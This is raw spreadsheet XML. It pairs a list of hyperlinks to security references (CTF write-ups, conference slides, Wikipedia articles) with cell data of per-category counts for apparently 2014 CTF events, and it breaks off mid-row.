TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://invisiblethingslab.com/resources/misc09/smm_cache_fun.pdf" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://sellaite.com/smsreceiver/index.php?phone=%200037255933368" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ctfs/write-ups-2015/tree/master/trend-micro-ctf-2015/misc/misc-100" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.blackhat.com/docs/asia-14/materials/Haruyama/Asia-14-Haruyama-I-Know-You-Want-Me-Unplugging-PlugX.pdf" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.trailofbits.com/2009/03/22/no-more-free-bugs/" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/drawing" Target="../drawings/drawing8.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Konrad_Zuse" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Main_Page" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Alan_Turing" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Honeypot_%28computing%29" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.torproject.org/" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://heartbleed.com/" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Denial-of-service_attack" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.explainxkcd.com/wiki/index.php/Little_Bobby_Tables" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://pastebin.com" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Tech_Model_Railroad_Club" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://resources.infosecinstitute.com/api-hooking-and-dll-injection-on-windows/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Race_condition" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ESAPI/esapi-java-legacy/blob/95d85be952ddb64e2a8997f6b862d6208d8ea9f2/configuration/esapi/ESAPI.properties" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cgisecurity.com/questions/falsepositive.shtml" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Advanced_Encryption_Standard" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Regin_(malware)" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Steganography" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.imdb.com/title/tt0086567/?ref_=nv_sr_1" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.defcon.org/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Ransomwar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c r="B1" s="1"/>
      <c r="C1" s="4" t="str">
        <f>SUM(C3:C98)</f>
        <v>2081</v>
      </c>
      <c r="D1" s="1"/>
      <c r="E1" s="1"/>
      <c r="F1" s="3"/>
      <c r="G1" s="3"/>
      <c r="H1" s="3"/>
      <c r="I1" s="3"/>
      <c r="J1" s="3"/>
      <c r="K1" s="3"/>
      <c r="L1" s="3"/>
      <c r="M1" s="3"/>
      <c r="N1" s="3"/>
      <c r="O1" s="3"/>
      <c r="P1" s="3"/>
      <c r="Q1" s="3"/>
      <c r="R1" s="3"/>
      <c r="S1" s="3"/>
      <c r="T1" s="3"/>
      <c r="U1" s="3"/>
      <c r="V1" s="3"/>
      <c r="W1" s="3"/>
      <c r="X1" s="3"/>
      <c r="Y1" s="3"/>
      <c r="Z1" s="3"/>
      <c r="AA1" s="3"/>
      <c r="AB1" s="3"/>
      <c r="AC1" s="3"/>
    </row>
    <row r="2">
      <c r="A2" s="1" t="s">
        <v>10</v>
      </c>
      <c r="B2" s="1" t="s">
        <v>11</v>
      </c>
      <c r="C2" s="1" t="s">
        <v>12</v>
      </c>
      <c r="D2" s="1" t="s">
        <v>13</v>
      </c>
      <c r="E2" s="1" t="s">
        <v>12</v>
      </c>
      <c r="F2" s="3"/>
      <c r="G2" s="3"/>
      <c r="H2" s="3"/>
      <c r="I2" s="3"/>
      <c r="J2" s="3"/>
      <c r="K2" s="3"/>
      <c r="L2" s="3"/>
      <c r="M2" s="3"/>
      <c r="N2" s="3"/>
      <c r="O2" s="3"/>
      <c r="P2" s="3"/>
      <c r="Q2" s="3"/>
      <c r="R2" s="3"/>
      <c r="S2" s="3"/>
      <c r="T2" s="3"/>
      <c r="U2" s="3"/>
      <c r="V2" s="3"/>
      <c r="W2" s="3"/>
      <c r="X2" s="3"/>
      <c r="Y2" s="3"/>
      <c r="Z2" s="3"/>
      <c r="AA2" s="3"/>
      <c r="AB2" s="3"/>
      <c r="AC2" s="3"/>
    </row>
    <row r="3">
      <c r="A3" s="10">
        <v>2014.0</v>
      </c>
      <c r="B3" s="10" t="s">
        <v>14</v>
      </c>
      <c r="C3" s="10">
        <v>66.0</v>
      </c>
      <c r="D3" s="10" t="s">
        <v>15</v>
      </c>
      <c r="E3" s="10">
        <v>14.0</v>
      </c>
      <c r="F3" s="10" t="s">
        <v>17</v>
      </c>
      <c r="G3" s="10">
        <v>11.0</v>
      </c>
      <c r="H3" s="10" t="s">
        <v>18</v>
      </c>
      <c r="I3" s="10">
        <v>10.0</v>
      </c>
      <c r="J3" s="10" t="s">
        <v>19</v>
      </c>
      <c r="K3" s="10">
        <v>5.0</v>
      </c>
      <c r="L3" s="10" t="s">
        <v>20</v>
      </c>
      <c r="M3" s="10">
        <v>4.0</v>
      </c>
      <c r="N3" s="10" t="s">
        <v>21</v>
      </c>
      <c r="O3" s="10">
        <v>9.0</v>
      </c>
      <c r="P3" s="10" t="s">
        <v>24</v>
      </c>
      <c r="Q3" s="10">
        <v>13.0</v>
      </c>
      <c r="R3" s="12"/>
      <c r="S3" s="12"/>
      <c r="T3" s="12"/>
      <c r="U3" s="12"/>
      <c r="V3" s="12"/>
      <c r="W3" s="12"/>
      <c r="X3" s="12"/>
      <c r="Y3" s="12"/>
      <c r="Z3" s="12"/>
      <c r="AA3" s="12"/>
      <c r="AB3" s="12"/>
      <c r="AC3" s="12"/>
    </row>
    <row r="4">
      <c r="A4" s="10">
        <v>2014.0</v>
      </c>
      <c r="B4" s="10" t="s">
        <v>28</v>
      </c>
      <c r="C4" s="10">
        <v>54.0</v>
      </c>
      <c r="D4" s="10" t="s">
        <v>17</v>
      </c>
      <c r="E4" s="10">
        <v>4.0</v>
      </c>
      <c r="F4" s="10" t="s">
        <v>29</v>
      </c>
      <c r="G4" s="10">
        <v>5.0</v>
      </c>
      <c r="H4" s="10" t="s">
        <v>30</v>
      </c>
      <c r="I4" s="10">
        <v>13.0</v>
      </c>
      <c r="J4" s="10" t="s">
        <v>31</v>
      </c>
      <c r="K4" s="10">
        <v>7.0</v>
      </c>
      <c r="L4" s="10" t="s">
        <v>32</v>
      </c>
      <c r="M4" s="10">
        <v>2.0</v>
      </c>
      <c r="N4" s="10" t="s">
        <v>33</v>
      </c>
      <c r="O4" s="10">
        <v>5.0</v>
      </c>
      <c r="P4" s="12"/>
      <c r="Q4" s="12"/>
      <c r="R4" s="12"/>
      <c r="S4" s="12"/>
      <c r="T4" s="12"/>
      <c r="U4" s="12"/>
      <c r="V4" s="12"/>
      <c r="W4" s="12"/>
      <c r="X4" s="12"/>
      <c r="Y4" s="12"/>
      <c r="Z4" s="12"/>
      <c r="AA4" s="12"/>
      <c r="AB4" s="12"/>
      <c r="AC4" s="12"/>
    </row>
    <row r="5">
      <c r="A5" s="10">
        <v>2014.0</v>
      </c>
      <c r="B5" s="10">
        <v>9447.0</v>
      </c>
      <c r="C5" s="10">
        <v>24.0</v>
      </c>
      <c r="D5" s="10" t="s">
        <v>34</v>
      </c>
      <c r="E5" s="10">
        <v>8.0</v>
      </c>
      <c r="F5" s="10" t="s">
        <v>20</v>
      </c>
      <c r="G5" s="10">
        <v>7.0</v>
      </c>
      <c r="H5" s="10" t="s">
        <v>31</v>
      </c>
      <c r="I5" s="10">
        <v>8.0</v>
      </c>
      <c r="J5" s="10" t="s">
        <v>33</v>
      </c>
      <c r="K5" s="10">
        <v>5.0</v>
      </c>
      <c r="L5" s="12"/>
      <c r="M5" s="12"/>
      <c r="N5" s="12"/>
      <c r="O5" s="12"/>
      <c r="P5" s="12"/>
      <c r="Q5" s="12"/>
      <c r="R5" s="12"/>
      <c r="S5" s="12"/>
      <c r="T5" s="12"/>
      <c r="U5" s="12"/>
      <c r="V5" s="12"/>
      <c r="W5" s="12"/>
      <c r="X5" s="12"/>
      <c r="Y5" s="12"/>
      <c r="Z5" s="12"/>
      <c r="AA5" s="12"/>
      <c r="AB5" s="12"/>
      <c r="AC5" s="12"/>
    </row>
    <row r="6">
      <c r="A6" s="1">
        <v>2014.0</v>
      </c>
      <c r="B6" s="1" t="s">
        <v>38</v>
      </c>
      <c r="C6" s="1">
        <v>27.0</v>
      </c>
      <c r="D6" s="1" t="s">
        <v>17</v>
      </c>
      <c r="E6" s="1">
        <v>8.0</v>
      </c>
      <c r="F6" s="1" t="s">
        <v>18</v>
      </c>
      <c r="G6" s="1">
        <v>3.0</v>
      </c>
      <c r="H6" s="1" t="s">
        <v>39</v>
      </c>
      <c r="I6" s="1">
        <v>6.0</v>
      </c>
      <c r="J6" s="1" t="s">
        <v>30</v>
      </c>
      <c r="K6" s="1">
        <v>1.0</v>
      </c>
      <c r="L6" s="1" t="s">
        <v>41</v>
      </c>
      <c r="M6" s="1">
        <v>3.0</v>
      </c>
      <c r="N6" s="1" t="s">
        <v>21</v>
      </c>
      <c r="O6" s="1">
        <v>5.0</v>
      </c>
      <c r="P6" s="1" t="s">
        <v>45</v>
      </c>
      <c r="Q6" s="1">
        <v>5.0</v>
      </c>
      <c r="R6" s="1" t="s">
        <v>46</v>
      </c>
      <c r="S6" s="1">
        <v>1.0</v>
      </c>
      <c r="T6" s="1" t="s">
        <v>33</v>
      </c>
      <c r="U6" s="1">
        <v>3.0</v>
      </c>
      <c r="V6" s="12"/>
      <c r="W6" s="12"/>
      <c r="X6" s="12"/>
      <c r="Y6" s="12"/>
      <c r="Z6" s="12"/>
      <c r="AA6" s="12"/>
      <c r="AB6" s="12"/>
      <c r="AC6" s="12"/>
    </row>
    <row r="7">
      <c r="A7" s="10">
        <v>2014.0</v>
      </c>
      <c r="B7" s="10" t="s">
        <v>52</v>
      </c>
      <c r="C7" s="10">
        <v>34.0</v>
      </c>
      <c r="D7" s="10" t="s">
        <v>17</v>
      </c>
      <c r="E7" s="10">
        <v>10.0</v>
      </c>
      <c r="F7" s="10" t="s">
        <v>18</v>
      </c>
      <c r="G7" s="10">
        <v>7.0</v>
      </c>
      <c r="H7" s="10" t="s">
        <v>39</v>
      </c>
      <c r="I7" s="10">
        <v>7.0</v>
      </c>
      <c r="J7" s="10" t="s">
        <v>31</v>
      </c>
      <c r="K7" s="10">
        <v>5.0</v>
      </c>
      <c r="L7" s="10" t="s">
        <v>45</v>
      </c>
      <c r="M7" s="10">
        <v>9.0</v>
      </c>
      <c r="N7" s="10" t="s">
        <v>46</v>
      </c>
      <c r="O7" s="10">
        <v>7.0</v>
      </c>
      <c r="P7" s="10" t="s">
        <v>53</v>
      </c>
      <c r="Q7" s="10">
        <v>1.0</v>
      </c>
      <c r="R7" s="10" t="s">
        <v>33</v>
      </c>
      <c r="S7" s="10">
        <v>5.0</v>
      </c>
      <c r="T7" s="12"/>
      <c r="U7" s="12"/>
      <c r="V7" s="12"/>
      <c r="W7" s="12"/>
      <c r="X7" s="12"/>
      <c r="Y7" s="12"/>
      <c r="Z7" s="12"/>
      <c r="AA7" s="12"/>
      <c r="AB7" s="12"/>
      <c r="AC7" s="12"/>
    </row>
    <row r="8">
      <c r="A8" s="10">
        <v>2014.0</v>
      </c>
      <c r="B8" s="10" t="s">
        <v>54</v>
      </c>
      <c r="C8" s="10">
        <v>21.0</v>
      </c>
      <c r="D8" s="10" t="s">
        <v>17</v>
      </c>
      <c r="E8" s="10">
        <v>5.0</v>
      </c>
      <c r="F8" s="10" t="s">
        <v>57</v>
      </c>
      <c r="G8" s="10">
        <v>4.0</v>
      </c>
      <c r="H8" s="10" t="s">
        <v>59</v>
      </c>
      <c r="I8" s="10">
        <v>6.0</v>
      </c>
      <c r="J8" s="10" t="s">
        <v>31</v>
      </c>
      <c r="K8" s="10">
        <v>6.0</v>
      </c>
      <c r="L8" s="12"/>
      <c r="M8" s="12"/>
      <c r="N8" s="12"/>
      <c r="O8" s="12"/>
      <c r="P8" s="12"/>
      <c r="Q8" s="12"/>
      <c r="R8" s="12"/>
      <c r="S8" s="12"/>
      <c r="T8" s="12"/>
      <c r="U8" s="12"/>
      <c r="V8" s="12"/>
      <c r="W8" s="12"/>
      <c r="X8" s="12"/>
      <c r="Y8" s="12"/>
      <c r="Z8" s="12"/>
      <c r="AA8" s="12"/>
      <c r="AB8" s="12"/>
      <c r="AC8" s="12"/>
    </row>
    <row r="9">
      <c r="A9" s="10">
        <v>2014.0</v>
      </c>
      <c r="B9" s="10" t="s">
        <v>66</v>
      </c>
      <c r="C9" s="10">
        <v>14.0</v>
      </c>
      <c r="D9" s="10" t="s">
        <v>18</v>
      </c>
      <c r="E9" s="10">
        <v>1.0</v>
      </c>
      <c r="F9" s="10" t="s">
        <v>68</v>
      </c>
      <c r="G9" s="10">
        <v>1.0</v>
      </c>
      <c r="H9" s="10" t="s">
        <v>59</v>
      </c>
      <c r="I9" s="10">
        <v>7.0</v>
      </c>
      <c r="J9" s="10" t="s">
        <v>31</v>
      </c>
      <c r="K9" s="10">
        <v>5.0</v>
      </c>
      <c r="L9" s="10" t="s">
        <v>33</v>
      </c>
      <c r="M9" s="10">
        <v>2.0</v>
      </c>
      <c r="N9" s="12"/>
      <c r="O9" s="12"/>
      <c r="P9" s="12"/>
      <c r="Q9" s="12"/>
      <c r="R9" s="12"/>
      <c r="S9" s="12"/>
      <c r="T9" s="12"/>
      <c r="U9" s="12"/>
      <c r="V9" s="12"/>
      <c r="W9" s="12"/>
      <c r="X9" s="12"/>
      <c r="Y9" s="12"/>
      <c r="Z9" s="12"/>
      <c r="AA9" s="12"/>
      <c r="AB9" s="12"/>
      <c r="AC9" s="12"/>
    </row>
    <row r="10">
      <c r="A10" s="1">
        <v>2014.0</v>
      </c>
      <c r="B10" s="1" t="s">
        <v>75</v>
      </c>
      <c r="C10" s="1">
        <v>7.0</v>
      </c>
      <c r="D10" s="10" t="s">
        <v>17</v>
      </c>
      <c r="E10" s="10">
        <v>3.0</v>
      </c>
      <c r="F10" s="10" t="s">
        <v>30</v>
      </c>
      <c r="G10" s="10">
        <v>2.0</v>
      </c>
      <c r="H10" s="10" t="s">
        <v>31</v>
      </c>
      <c r="I10" s="10">
        <v>2.0</v>
      </c>
      <c r="J10" s="12"/>
      <c r="K10" s="12"/>
      <c r="L10" s="12"/>
      <c r="M10" s="12"/>
      <c r="N10" s="12"/>
      <c r="O10" s="12"/>
      <c r="P10" s="12"/>
      <c r="Q10" s="12"/>
      <c r="R10" s="12"/>
      <c r="S10" s="12"/>
      <c r="T10" s="12"/>
      <c r="U10" s="12"/>
      <c r="V10" s="12"/>
      <c r="W10" s="12"/>
      <c r="X10" s="12"/>
      <c r="Y10" s="12"/>
      <c r="Z10" s="12"/>
      <c r="AA10" s="12"/>
      <c r="AB10" s="12"/>
      <c r="AC10" s="12"/>
    </row>
    <row r="11">
      <c r="A11" s="10">
        <v>2014.0</v>
      </c>
      <c r="B11" s="10" t="s">
        <v>79</v>
      </c>
      <c r="C11" s="10">
        <v>31.0</v>
      </c>
      <c r="D11" s="10" t="s">
        <v>17</v>
      </c>
      <c r="E11" s="10">
        <v>3.0</v>
      </c>
      <c r="F11" s="10" t="s">
        <v>34</v>
      </c>
      <c r="G11" s="10">
        <v>7.0</v>
      </c>
      <c r="H11" s="10" t="s">
        <v>18</v>
      </c>
      <c r="I11" s="10">
        <v>1.0</v>
      </c>
      <c r="J11" s="10" t="s">
        <v>80</v>
      </c>
      <c r="K11" s="10">
        <v>1.0</v>
      </c>
      <c r="L11" s="10" t="s">
        <v>41</v>
      </c>
      <c r="M11" s="10">
        <v>3.0</v>
      </c>
      <c r="N11" s="10" t="s">
        <v>31</v>
      </c>
      <c r="O11" s="10">
        <v>5.0</v>
      </c>
      <c r="P11" s="10" t="s">
        <v>46</v>
      </c>
      <c r="Q11" s="10">
        <v>6.0</v>
      </c>
      <c r="R11" s="10" t="s">
        <v>33</v>
      </c>
      <c r="S11" s="10">
        <v>2.0</v>
      </c>
      <c r="T11" s="12"/>
      <c r="U11" s="12"/>
      <c r="V11" s="12"/>
      <c r="W11" s="12"/>
      <c r="X11" s="12"/>
      <c r="Y11" s="12"/>
      <c r="Z11" s="12"/>
      <c r="AA11" s="12"/>
      <c r="AB11" s="12"/>
      <c r="AC11" s="12"/>
    </row>
    <row r="12">
      <c r="A12" s="10">
        <v>2014.0</v>
      </c>
      <c r="B12" s="10" t="s">
        <v>81</v>
      </c>
      <c r="C12" s="10">
        <v>22.0</v>
      </c>
      <c r="D12" s="10" t="s">
        <v>82</v>
      </c>
      <c r="E12" s="10">
        <v>2.0</v>
      </c>
      <c r="F12" s="10" t="s">
        <v>34</v>
      </c>
      <c r="G12" s="10">
        <v>4.0</v>
      </c>
      <c r="H12" s="10" t="s">
        <v>20</v>
      </c>
      <c r="I12" s="10">
        <v>4.0</v>
      </c>
      <c r="J12" s="10" t="s">
        <v>83</v>
      </c>
      <c r="K12" s="10">
        <v>4.0</v>
      </c>
      <c r="L12" s="10" t="s">
        <v>84</v>
      </c>
      <c r="M12" s="10">
        <v>4.0</v>
      </c>
      <c r="N12" s="10" t="s">
        <v>33</v>
      </c>
      <c r="O12" s="10">
        <v>4.0</v>
      </c>
      <c r="P12" s="12"/>
      <c r="Q12" s="12"/>
      <c r="R12" s="12"/>
      <c r="S12" s="12"/>
      <c r="T12" s="12"/>
      <c r="U12" s="12"/>
      <c r="V12" s="12"/>
      <c r="W12" s="12"/>
      <c r="X12" s="12"/>
      <c r="Y12" s="12"/>
      <c r="Z12" s="12"/>
      <c r="AA12" s="12"/>
      <c r="AB12" s="12"/>
      <c r="AC12" s="12"/>
    </row>
    <row r="13">
      <c r="A13" s="1">
        <v>2014.0</v>
      </c>
      <c r="B13" s="1" t="s">
        <v>88</v>
      </c>
      <c r="C13" s="1">
        <v>7.0</v>
      </c>
      <c r="D13" s="1" t="s">
        <v>53</v>
      </c>
      <c r="E13" s="1">
        <v>7.0</v>
      </c>
      <c r="F13" s="12"/>
      <c r="G13" s="12"/>
      <c r="H13" s="12"/>
      <c r="I13" s="12"/>
      <c r="J13" s="12"/>
      <c r="K13" s="12"/>
      <c r="L13" s="12"/>
      <c r="M13" s="12"/>
      <c r="N13" s="12"/>
      <c r="O13" s="12"/>
      <c r="P13" s="12"/>
      <c r="Q13" s="12"/>
      <c r="R13" s="12"/>
      <c r="S13" s="12"/>
      <c r="T13" s="12"/>
      <c r="U13" s="12"/>
      <c r="V13" s="12"/>
      <c r="W13" s="12"/>
      <c r="X13" s="12"/>
      <c r="Y13" s="12"/>
      <c r="Z13" s="12"/>
      <c r="AA13" s="12"/>
      <c r="AB13" s="12"/>
      <c r="AC13" s="12"/>
    </row>
    <row r="14">
      <c r="A14" s="1">
        <v>2014.0</v>
      </c>
      <c r="B14" s="1" t="s">
        <v>98</v>
      </c>
      <c r="C14" s="1">
        <v>22.0</v>
      </c>
      <c r="D14" s="1" t="s">
        <v>101</v>
      </c>
      <c r="E14" s="1">
        <v>2.0</v>
      </c>
      <c r="F14" s="1" t="s">
        <v>102</v>
      </c>
      <c r="G14" s="1">
        <v>1.0</v>
      </c>
      <c r="H14" s="1" t="s">
        <v>104</v>
      </c>
      <c r="I14" s="1">
        <v>3.0</v>
      </c>
      <c r="J14" s="1" t="s">
        <v>105</v>
      </c>
      <c r="K14" s="1">
        <v>3.0</v>
      </c>
      <c r="L14" s="1" t="s">
        <v>107</v>
      </c>
      <c r="M14" s="1">
        <v>4.0</v>
      </c>
      <c r="N14" s="1" t="s">
        <v>109</v>
      </c>
      <c r="O14" s="1">
        <v>2.0</v>
      </c>
      <c r="P14" s="1" t="s">
        <v>110</v>
      </c>
      <c r="Q14" s="1">
        <v>2.0</v>
      </c>
      <c r="R14" s="1" t="s">
        <v>111</v>
      </c>
      <c r="S14" s="1">
        <v>1.0</v>
      </c>
      <c r="T14" s="1" t="s">
        <v>112</v>
      </c>
      <c r="U14" s="1">
        <v>3.0</v>
      </c>
      <c r="V14" s="12"/>
      <c r="W14" s="12"/>
      <c r="X14" s="12"/>
      <c r="Y14" s="12"/>
      <c r="Z14" s="12"/>
      <c r="AA14" s="12"/>
      <c r="AB14" s="12"/>
      <c r="AC14" s="12"/>
    </row>
    <row r="15">
      <c r="A15" s="10">
        <v>2014.0</v>
      </c>
      <c r="B15" s="10" t="s">
        <v>113</v>
      </c>
      <c r="C15" s="10">
        <v>17.0</v>
      </c>
      <c r="D15" s="10" t="s">
        <v>17</v>
      </c>
      <c r="E15" s="10">
        <v>4.0</v>
      </c>
      <c r="F15" s="10" t="s">
        <v>20</v>
      </c>
      <c r="G15" s="10">
        <v>4.0</v>
      </c>
      <c r="H15" s="10" t="s">
        <v>41</v>
      </c>
      <c r="I15" s="10">
        <v>3.0</v>
      </c>
      <c r="J15" s="10" t="s">
        <v>31</v>
      </c>
      <c r="K15" s="10">
        <v>4.0</v>
      </c>
      <c r="L15" s="10" t="s">
        <v>33</v>
      </c>
      <c r="M15" s="10">
        <v>2.0</v>
      </c>
      <c r="N15" s="12"/>
      <c r="O15" s="12"/>
      <c r="P15" s="12"/>
      <c r="Q15" s="12"/>
      <c r="R15" s="12"/>
      <c r="S15" s="12"/>
      <c r="T15" s="12"/>
      <c r="U15" s="12"/>
      <c r="V15" s="12"/>
      <c r="W15" s="12"/>
      <c r="X15" s="12"/>
      <c r="Y15" s="12"/>
      <c r="Z15" s="12"/>
      <c r="AA15" s="12"/>
      <c r="AB15" s="12"/>
      <c r="AC15" s="12"/>
    </row>
    <row r="16">
      <c r="A16" s="10">
        <v>2014.0</v>
      </c>
      <c r="B16" s="10" t="s">
        <v>115</v>
      </c>
      <c r="C16" s="10">
        <v>22.0</v>
      </c>
      <c r="D16" s="10" t="s">
        <v>17</v>
      </c>
      <c r="E16" s="10">
        <v>3.0</v>
      </c>
      <c r="F16" s="10" t="s">
        <v>34</v>
      </c>
      <c r="G16" s="10">
        <v>5.0</v>
      </c>
      <c r="H16" s="10" t="s">
        <v>18</v>
      </c>
      <c r="I16" s="10">
        <v>4.0</v>
      </c>
      <c r="J16" s="10" t="s">
        <v>41</v>
      </c>
      <c r="K16" s="10">
        <v>4.0</v>
      </c>
      <c r="L16" s="10" t="s">
        <v>31</v>
      </c>
      <c r="M16" s="10">
        <v>3.0</v>
      </c>
      <c r="N16" s="10" t="s">
        <v>33</v>
      </c>
      <c r="O16" s="10">
        <v>3.0</v>
      </c>
      <c r="P16" s="12"/>
      <c r="Q16" s="12"/>
      <c r="R16" s="12"/>
      <c r="S16" s="12"/>
      <c r="T16" s="12"/>
      <c r="U16" s="12"/>
      <c r="V16" s="12"/>
      <c r="W16" s="12"/>
      <c r="X16" s="12"/>
      <c r="Y16" s="12"/>
      <c r="Z16" s="12"/>
      <c r="AA16" s="12"/>
      <c r="AB16" s="12"/>
      <c r="AC16" s="12"/>
    </row>
    <row r="17">
      <c r="A17" s="10">
        <v>2014.0</v>
      </c>
      <c r="B17" s="10" t="s">
        <v>117</v>
      </c>
      <c r="C17" s="10">
        <v>27.0</v>
      </c>
      <c r="D17" s="10" t="s">
        <v>120</v>
      </c>
      <c r="E17" s="10">
        <v>11.0</v>
      </c>
      <c r="F17" s="10" t="s">
        <v>17</v>
      </c>
      <c r="G17" s="10">
        <v>4.0</v>
      </c>
      <c r="H17" s="10" t="s">
        <v>18</v>
      </c>
      <c r="I17" s="10">
        <v>1.0</v>
      </c>
      <c r="J17" s="10" t="s">
        <v>30</v>
      </c>
      <c r="K17" s="10">
        <v>4.0</v>
      </c>
      <c r="L17" s="10" t="s">
        <v>41</v>
      </c>
      <c r="M17" s="10">
        <v>3.0</v>
      </c>
      <c r="N17" s="10" t="s">
        <v>31</v>
      </c>
      <c r="O17" s="10">
        <v>2.0</v>
      </c>
      <c r="P17" s="10" t="s">
        <v>46</v>
      </c>
      <c r="Q17" s="10">
        <v>2.0</v>
      </c>
      <c r="R17" s="12"/>
      <c r="S17" s="12"/>
      <c r="T17" s="12"/>
      <c r="U17" s="12"/>
      <c r="V17" s="12"/>
      <c r="W17" s="12"/>
      <c r="X17" s="12"/>
      <c r="Y17" s="12"/>
      <c r="Z17" s="12"/>
      <c r="AA17" s="12"/>
      <c r="AB17" s="12"/>
      <c r="AC17" s="12"/>
    </row>
    <row r="18">
      <c r="A18" s="10">
        <v>2014.0</v>
      </c>
      <c r="B18" s="10" t="s">
        <v>122</v>
      </c>
      <c r="C18" s="10">
        <v>25.0</v>
      </c>
      <c r="D18" s="10" t="s">
        <v>17</v>
      </c>
      <c r="E18" s="10">
        <v>3.0</v>
      </c>
      <c r="F18" s="10" t="s">
        <v>18</v>
      </c>
      <c r="G18" s="10">
        <v>5.0</v>
      </c>
      <c r="H18" s="10" t="s">
        <v>20</v>
      </c>
      <c r="I18" s="10">
        <v>5.0</v>
      </c>
      <c r="J18" s="10" t="s">
        <v>124</v>
      </c>
      <c r="K18" s="10">
        <v>5.0</v>
      </c>
      <c r="L18" s="10" t="s">
        <v>46</v>
      </c>
      <c r="M18" s="10">
        <v>2.0</v>
      </c>
      <c r="N18" s="10" t="s">
        <v>33</v>
      </c>
      <c r="O18" s="10">
        <v>5.0</v>
      </c>
      <c r="P18" s="12"/>
      <c r="Q18" s="12"/>
      <c r="R18" s="12"/>
      <c r="S18" s="12"/>
      <c r="T18" s="12"/>
      <c r="U18" s="12"/>
      <c r="V18" s="12"/>
      <c r="W18" s="12"/>
      <c r="X18" s="12"/>
      <c r="Y18" s="12"/>
      <c r="Z18" s="12"/>
      <c r="AA18" s="12"/>
      <c r="AB18" s="12"/>
      <c r="AC18" s="12"/>
    </row>
    <row r="19">
      <c r="A19" s="10">
        <v>2014.0</v>
      </c>
      <c r="B19" s="10" t="s">
        <v>125</v>
      </c>
      <c r="C19" s="10">
        <v>30.0</v>
      </c>
      <c r="D19" s="10" t="s">
        <v>17</v>
      </c>
      <c r="E19" s="10">
        <v>4.0</v>
      </c>
      <c r="F19" s="10" t="s">
        <v>127</v>
      </c>
      <c r="G19" s="10">
        <v>8.0</v>
      </c>
      <c r="H19" s="10" t="s">
        <v>20</v>
      </c>
      <c r="I19" s="10">
        <v>3.0</v>
      </c>
      <c r="J19" s="10" t="s">
        <v>31</v>
      </c>
      <c r="K19" s="10">
        <v>8.0</v>
      </c>
      <c r="L19" s="10" t="s">
        <v>33</v>
      </c>
      <c r="M19" s="10">
        <v>7.0</v>
      </c>
      <c r="N19" s="12"/>
      <c r="O19" s="12"/>
      <c r="P19" s="12"/>
      <c r="Q19" s="12"/>
      <c r="R19" s="12"/>
      <c r="S19" s="12"/>
      <c r="T19" s="12"/>
      <c r="U19" s="12"/>
      <c r="V19" s="12"/>
      <c r="W19" s="12"/>
      <c r="X19" s="12"/>
      <c r="Y19" s="12"/>
      <c r="Z19" s="12"/>
      <c r="AA19" s="12"/>
      <c r="AB19" s="12"/>
      <c r="AC19" s="12"/>
    </row>
    <row r="20">
      <c r="A20" s="10">
        <v>2014.0</v>
      </c>
      <c r="B20" s="10" t="s">
        <v>132</v>
      </c>
      <c r="C20" s="10">
        <v>12.0</v>
      </c>
      <c r="D20" s="10" t="s">
        <v>17</v>
      </c>
      <c r="E20" s="10">
        <v>4.0</v>
      </c>
      <c r="F20" s="10" t="s">
        <v>133</v>
      </c>
      <c r="G20" s="10">
        <v>4.0</v>
      </c>
      <c r="H20" s="10" t="s">
